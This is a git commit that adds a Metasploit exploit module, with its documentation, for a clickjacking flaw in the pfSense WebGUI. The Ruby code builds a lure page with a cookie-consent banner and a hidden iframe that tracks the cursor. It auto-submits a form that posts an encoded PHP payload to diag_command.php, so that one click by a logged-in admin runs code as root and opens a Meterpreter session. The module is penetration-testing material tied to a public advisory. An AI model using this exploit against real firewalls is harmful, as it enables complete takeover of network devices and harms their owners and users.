Add exploit module for Clickjacking vulnerability in CSRF error page pfSense

ykoster · ykoster · commit 916ee05cceec · 2017-11-22T11:06:22.000+01:00
diff --git a/documentation/modules/exploit/unix/http/pfsense_clickjacking.md b/documentation/modules/exploit/unix/http/pfsense_clickjacking.md
@@ -0,0 +1,23 @@
+## Vulnerable Application
+
+This vulnerability affects any pfSense versions prior to 2.4.2-RELEASE.
+
+## Vulnerable Setup
+
+The victim should be able to access the WebGUI & must be logged in as admin in order for this exploit to work. Possible the WebGUI's TLS certificate must be trusted in the browser.
+
+## Verification Steps
+
+  1. `use exploit/unix/http/pfsense_clickjacking`
+  2. `set TARGETURI https://<ip WebGUI>`
+  3. `exploit`
+  4. Browse to the URL return by MSF
+  5. Click anywhere on the returned page
+  6. Note that a new Meterpreter sessions was started.
+
+
+## Options
+
+**TARGETURI**
+
+The base path of the WebGUI. The default base path is https://192.168.1.1/
diff --git a/modules/exploits/unix/http/pfsense_clickjacking.rb b/modules/exploits/unix/http/pfsense_clickjacking.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'            => 'Clickjacking Vulnerability In CSRF Error Page pfSense',
+        'Description'     => %q{
+          This module exploits a Clickjacking vulnerability in pfSense <= 2.4.1.
+
+          pfSense is a free and open source firewall and router. It was found that the
+          pfSense WebGUI is vulnerable to Clickjacking. By tricking an authenticated admin
+          into interacting with a specially crafted webpage it is possible for an attacker
+          to execute arbitrary code in the WebGUI. Since the WebGUI runs as the root user,
+          this will result in a full compromise of the pfSense instance.
+        },
+        'Author'          => 'Yorick Koster',
+        'Payload'         => { 'BadChars' => '"' },
+        'License'         => MSF_LICENSE,
+        'References'      =>
+          [
+            ['URL', 'https://acc.securify.nl/en/advisory/SFY20171101/clickjacking-vulnerability-in-csrf-error-page-pfsense.html'],
+            ['URL', 'https://doc.pfsense.org/index.php/2.4.2_New_Features_and_Changes']
+          ],
+        'DefaultOptions'  =>
+          {
+            'EXITFUNC'    => 'process'
+          },
+        'Arch'            => ARCH_PHP,
+        'Platform'        => 'php',
+        'Targets'         =>
+          [
+            [ 'pfSense <= 2.4.1', { 'auto' => false } ]
+          ],
+        'DefaultTarget'   => 0,
+        'DisclosureDate'  => 'Mon Day Year'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the web application', 'https://192.168.1.1'])
+      ]
+    )
+  end
+
+  def on_request_uri(cli, request)
+    if datastore['TARGETURI'].end_with? '/'
+      url = datastore['TARGETURI'] + 'diag_command.php'
+    else
+      url = datastore['TARGETURI'] + '/diag_command.php'
+    end
+    framename = rand_text_alpha(16)
+    divname = rand_text_alpha(16)
+    resp = create_response(200, "OK")
+    resp.body = %Q|<!DOCTYPE html>
+<html>
+<meta charset="utf-8">
+<link rel="stylesheet" type="text/css" href="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css" />
+<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js"></script>
+<script>
+window.addEventListener("load", function(){
+window.cookieconsent.initialise({
+        "palette": {
+                "popup": {
+                        "background": "#000",
+                        "text": "#0f0"
+                },
+                "button": {
+                        "background": "#0f0"
+                }
+        },
+        "position": "top",
+        "static": true
+        });
+});
+</script>
+<script>
+document.cookie = 'cookieconsent_status=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
+window.addEventListener('load', function(){
+        document.forms[0].post.click();
+        document.onmousemove = function(e) {
+                var e = e \|\| window.event;
+                var s = document.getElementById('#{divname}');
+                s.style.left  = (e.clientX - 10) + 'px';
+                s.style.top = (e.clientY - 5) + 'px';
+        };
+});
+</script>
+<body style="background-image:url(https://static.pexels.com/photos/1445/blur-river-blurred-background.jpg);background-size:cover;">
+<div id="#{divname}" style="position:absolute;z-index:10;border:none;width:20px;height:10px;overflow:hidden;opacity:0.0;">
+<iframe src="about:blank" name="#{framename}" sandbox="allow-forms" border="no" scrolling="no" width="800" height="800" style="width:400px;height:800px;margin-top:-70px;margin-left:-40px;"></iframe>
+</div>
+<div style="display:none">
+<form action="#{url}" method="POST" enctype="multipart/form-data" target="#{framename}">
+        <input type="hidden" name="txtPHPCommand" value="#{payload.encoded}" />
+        <input type="hidden" name="submit" value="EXECPHP" />
+        <input type="submit" name="post"/>
+</form>
+</div>
+</body>
+</html>
+|
+    resp['Content-Type'] = 'text/html'
+    cli.send_response(resp)
+  end
+end
